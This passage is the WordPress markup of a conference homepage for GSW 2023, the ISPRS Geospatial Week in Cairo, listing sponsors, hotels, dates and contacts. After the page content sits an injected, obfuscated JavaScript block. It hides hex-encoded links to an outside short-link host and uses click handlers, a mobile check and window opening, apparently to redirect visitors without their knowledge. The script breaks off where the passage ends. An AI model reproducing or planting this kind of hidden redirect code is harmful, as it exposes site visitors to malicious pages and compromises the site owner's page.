css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\n<p><img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\n<p><img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 